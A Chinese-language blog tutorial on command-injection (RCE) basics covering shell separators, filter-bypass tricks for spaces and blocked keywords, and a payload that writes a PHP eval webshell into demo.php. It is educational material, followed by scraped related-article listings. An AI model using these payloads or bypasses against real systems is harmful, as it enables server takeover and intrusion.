Web安全基础--命令行注入

最新推荐文章于 2024-04-26 20:05:58 发布
置顶 最新推荐文章于 2024-04-26 20:05:58 发布
阅读量652 收藏 1
点赞数
分类专栏: 安全测试 文章标签: 1024程序员节 安全 web安全 命令模式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hapenl/article/details/127486669
版权

 【概念】

命令行注入漏洞:命令执行漏洞(RCE,remote command execute)

【原理】

在应用程序开发过程中,使用了一些函数来执行系统指令,在没有做好过滤的情况下,导致外 部用户通过拼接参数到命令中,产生注入漏洞。

注入条件:

1、客户端输入值作为拼接到参数中;

2、没有足够的条件过滤;

3、应用系统中有相关敏感函数的引用

【漏洞影响】

1、继承web服务器程序权限(web用户权限),便可去执行系统命令

2、继承web服务器权限,便可读写文件等

3、反弹shell

4、控制整个网站

5、控制整个服务器

【常见的指令拼接符】

在命令行注入时经常会使用的拼接符 |、&和;符。

1、| 符:管道符“|”上一条命令的输出,作为下一条命令参数(command1|command2 )

1.1 如 ping www.baidu.com | ls

1.2 注意:当command1执行报错时,结果会打印command2的结果以及command1的错误信息

2、&符:&放在启动参数后面表示设置此命令在后台运行

2.1  如 cp –R /home/happen /backup/happen/ &

2.2  在命令注入漏洞中&符解析成 command1 & command2(表示先执行command1后执行 command2)

3、;符:command1;command2(命令从左到右顺序执行)

4、在命令行注入时经常会使用的拼接符||和&&

4.1  || 符:command1||command2(当左边为假时执行右边命令)

4.2  &&符: command1&&command2(当左边为真时执行右边命令

【常见类型绕过方法】

1、在Web程序中有对空格过滤的情况,如下图

 绕过方式有:

<,<>,%20(space),%09(tab),$IFS$9,  I F S , {IFS},IFS,IFS

 2、在Web程序中有对关键词cat命令过滤的情况,如

 cat绕过方式有:

2.1 less或more或tail命令绕过

 

2.2 注入一句话木马:

127.0.0.1&echo "<?php @eval(\$_POST['shell']);?>">> demo.php

2.3 通过反斜杠或链接符绕过 

反斜杠:ca\t fl\ag.php

链接符:ca"t fla"g.txt

Hapen_Lu
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
webcmd:一个web版的命令行界面
07-07
网络命令 一个网页版的命令行界面 WebCmd 被定义为单例。 初始化方法: WebCmd.init(options) options 是一个 json 对象,字段如下: title --line title,默认:"cmd"welcomeMsg --text 进入waitingMsg时显示 --waiting 消息,默认:"[请稍候。 .. ]" 路由 --json 对象,包含以下字段: regex: handler: function(cmd, matchArr, thiz) oncancel: function(thiz) 可选 WebCmd.output(str) WebCmd.newLine(title) title {string} : 可选 WebCmd.wait(waitingMsg) waitingMsg {string}:可选,仅适用一次 WebCmd.stopW
Command Injection(命令行注入
热门推荐
kid的博客
05-06 2万+
Command Injection(命令行注入) 前言 主要集合dvwa对命令行注入进行学习 内容比较基础简单 练习 Low 可以看到这是一个可以输入ip,测试连通性的界面 我觉得这个看代码来审计就很清楚了,这里我们输入(这里是Linux系统)会与’ping -c 4’拼接在一起,然后当做命令执行…这就给了我们很大的操作空间 && 可以用来执行多条命令 可以看到这里我加上 &...
sql in 收集
jianghl_soft的专栏
06-06 447
1.判断有无注入点 ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0and 03.猜帐号数目 如果遇到0and 0and 14.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称. and 1=(select count(*) from admin where len(*) >
渗透测试-命令执行注入
lza20001103的博客
07-20 2056
渗透测试-命令执行注入
命令行注入浅析(一)
qq_43006864的博客
12-24 743
一、命令行注入。 首先了解下,什么是命令行注入命令行注入:指web应用程序中调用了系统可执行命令的函数,而且输入参数是可控的,如果黑客拼接了注入命令,那么就可以执行dos命令之类的操作指令了。 类似于下图,执行ipconfig 二、常见的拼接方式。 A;B A不论正确与否都会执行B命令A&B A后台运行,A和B同时执行A&&B A执行成功时候才会执行B命令A|B A执行的输出结果,作为B命令的参数,A不论正确与否都会执行B命令A||B A执行失贩后才会执行B..
命令注入总结
weixin_44576725的博客
12-15 6141
文章目录命令注入总结原理常见的危险函数PHPsystemexecpassthrushell_execpopenproc_open反引号Pythonsystempopensubprocess.call/subprocess.runspawnJavajava.lang.Runtime.getRuntime().exec(command)Linux下常用的符号特殊符号通配符常用绕过命令分隔与执行多条命令空格绕过绕过 escapeshellcmd黑名单绕过无参数rce过滤字母或数字常用读取文件方式常用读取目录方式利
08-(RCE)命令及代码执行漏洞
qq_56414082的博客
03-28 815
RCE英文全称:remote command/code execute(远程命令/代码执行漏洞)分为远程命令执行ping和远程代码执行eval。
第30天:RCE代码和命令执行漏洞
cailme的博客
07-02 224
渗透测试day30
什么是命令注入命令注入如何避免?
llzhang_fly的博客
08-13 1万+
1、什么是命令注入 Command Injection,即命令注入攻击,是指由于嵌入式应用程序或者 web应用程序对用户提交的数据过滤不严格,导致黑客可以通过构造特殊命令字符串的方式,将数据提交至应用程序中,并利用该方式执行外部程序或系统命令实施攻击,非法获取数据或者网络资源等。 在命令注入的漏洞中,最为常见的是PHP的命令注入。PHP命令注入攻击存在的主要原因是Web应用程序员在应用PHP语言中一些具有命令执行功能的函数时,对用户提交的数据内容没有进行严格的过滤就带入函...
命令注入实操与总结
qq_51582652的博客
03-24 1823
这个内容是为了了解命令注入攻击的过程,掌握思路。记一次DVWA靶场的通关,commix-testbed靶场的实验。
WSTOOL : Web vulerable scan tool-开源
04-24
Web漏洞扫描工具※SQL注入※XSS跨站点脚本编制※404/500服务器错误※Admin / Manage文件夹搜索※PHP的基于Web命令行的扫描程序※使用HTML FORM和LINK http:// wstool进行校对。 sourceforge.net
关于读取popen输出结果时未截断字符串导致的命令行注入详解
12-31
然而,命令行注入不仅在web中会出现,在C语言程序中,也会出现命令行注入的漏洞。比方说这道pwn题,就是调用system时,没有对输入数据进行\0截断以及对特殊字符处理不当而导致的。 命令行注入相对于其他二进制漏洞...
AspNetCore-WebApi-Course:使用ASP.NET Core 3.1 WebAPI的专业REST API设计
05-12
:1st_place_medal: 使用ASP.NET Core WebAPI的专业REST API设计该项目是使用ASP.NET Core构建RESTful Web API的轻量级和可扩展基础结构的示例。 此示例包含许多技巧和技术,这些技巧和技术是我多年在ASP.NET Core中...
webfriend:您在现代Web自动化和测试中的友好朋友
01-31
“您在现代Web自动化和测试中的友好朋友。” 总览 Webfriend是Python库和命令行实用程序,与集成以控制Google Chrome或Chromium浏览器实例。 还有一种专门构建的脚本语言(称为 ),旨在作为Python的一种易于学习的...
kiosk-browser:带信息亭模式的强化Web浏览器
05-09
预加载脚本,用于将其他功能注入网站 跨数个显示器 重新缩放过大/过小的内容 安装 只需从发布部分中获取特定于您平台的二进制文件即可。 配置 命令行 Kiosk Web Browser Usage: Electron [options] [url] Options: ...
全视通智慧手术室对讲方案,让手术更安全更高效
2301_78035670的博客
04-24 471
全视通智慧手术室对讲方案通过整合等候区公告屏、医护主机、手术间门口机、复苏室主机等多个模块和设备,专用于手术室、护士站、谈话间、复苏室、器械室和其他协同部门,实现了对手术流程的全面管理和监控。
跨境电商测评攻略:如何安全有效地提升业绩?
zcwz888的博客
04-23 355
但自养号需要解决技术层面的问题,如果是买设备或者软件这种,可能上一秒还能用,下一秒就因为平台风控的原因批量封号,因为平台会通过ip 获取到设备的型号,地区码,监管码,主板码,WIFI地址,甚至是颜色,指纹码,IP地址等等大概几十个参数,参数关联后,触发平台机审,导致的砍单,封号。这时候要好好规划一下测评的事情,做美客多到最后你会发现,测评是最有效果的,因为测评的本质就是玩弄流量,模仿用户的真实行为让流量变得更多,从而得到跨境电商平台规则的加成,竞争激烈的产品不测评和别人竞争。
网络安全实训Day16
最新发布
Yisitelz的博客
04-26 378
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
4.3 海思SS928开发 - uboot开发 - 非安全启动镜像制作
luohaha66的博客
04-23 286
上电,启动GSL,启动uboot,引导内核启动。
.net core webapi 依赖注入 CSRedisClient 如何实现
04-01
要在 .NET Core WebAPI 中实现依赖注入 CSRedisClient,可以按照以下步骤操作: 1. 安装 NuGet 包 使用 NuGet 包管理器或命令行,安装 CSRedis 包: ``` Install-Package CSRedis ``` 2. 注册 Redis 客户端服务 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值